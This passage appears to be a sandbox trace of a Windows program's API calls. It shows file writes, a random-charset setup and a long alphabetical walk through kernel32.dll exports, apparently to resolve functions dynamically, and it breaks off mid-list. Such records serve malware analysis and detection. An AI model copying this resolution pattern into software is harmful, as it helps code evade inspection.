pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.991] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.992] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.992] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.993] CloseHandle (hObject=0x43c) returned 1 [0082.993] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.993] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.993] CloseHandle (hObject=0x0) returned 0 [0082.994] CloseHandle (hObject=0x438) returned 1 [0082.994] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.994] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.994] GetTickCount () returned 0x114d385 [0082.994] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.994] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.994] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.995] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.995] lstrlenA (lpString="kernel32.dll") returned 12 [0082.995] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.995] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.995] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.995] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.995] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.995] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.995] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.995] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.995] lstrlenA (lpString="ADDATOMA") returned 8 [0082.995] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.995] lstrlenA (lpString="ADDATOMW") returned 8 [0082.995] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.995] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.995] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.995] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.995] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.995] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.995] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.995] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.996] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.996] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.996] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.996] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.996] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.996] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.996] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.996] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.996] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.996] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.996] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.996] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.996] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.996] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.996] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.996] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.996] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.996] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.996] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.997] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.997] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.997] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.997] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.997] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.997] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.997] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.997] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.997] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.997] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.997] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.997] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.997] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.997] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.997] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.997] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.997] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.997] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.997] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.998] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.998] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.998] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.998] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.998] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.998] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.998] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.998] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.998] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.998] lstrlenA (lpString="BEEP") returned 4 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.998] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.998] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.998] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.998] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.998] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.998] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.998] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.998] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.998] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.998] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.999] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.999] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.999] lstrlenA (lpString="CANCELIO") returned 8 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.999] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.999] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.999] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.999] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.999] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.999] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.999] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.999] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.999] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.999] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.999] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.999] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.999] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.999] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.999] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.999] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.000] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.000] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.000] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.000] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.000] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.000] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.000] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.000] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.000] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.000] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.000] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.000] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.000] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.000] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.000] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.000] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.000] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.000] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.000] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.001] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.001] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.001] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.001] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.001] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.001] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.001] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.001] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.001] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.001] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.001] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.001] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.001] lstrlenA (lpString="COPYFILEA") returned 9 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.001] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.001] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.001] lstrcpyA (in: lpString1=0x3f2d468, 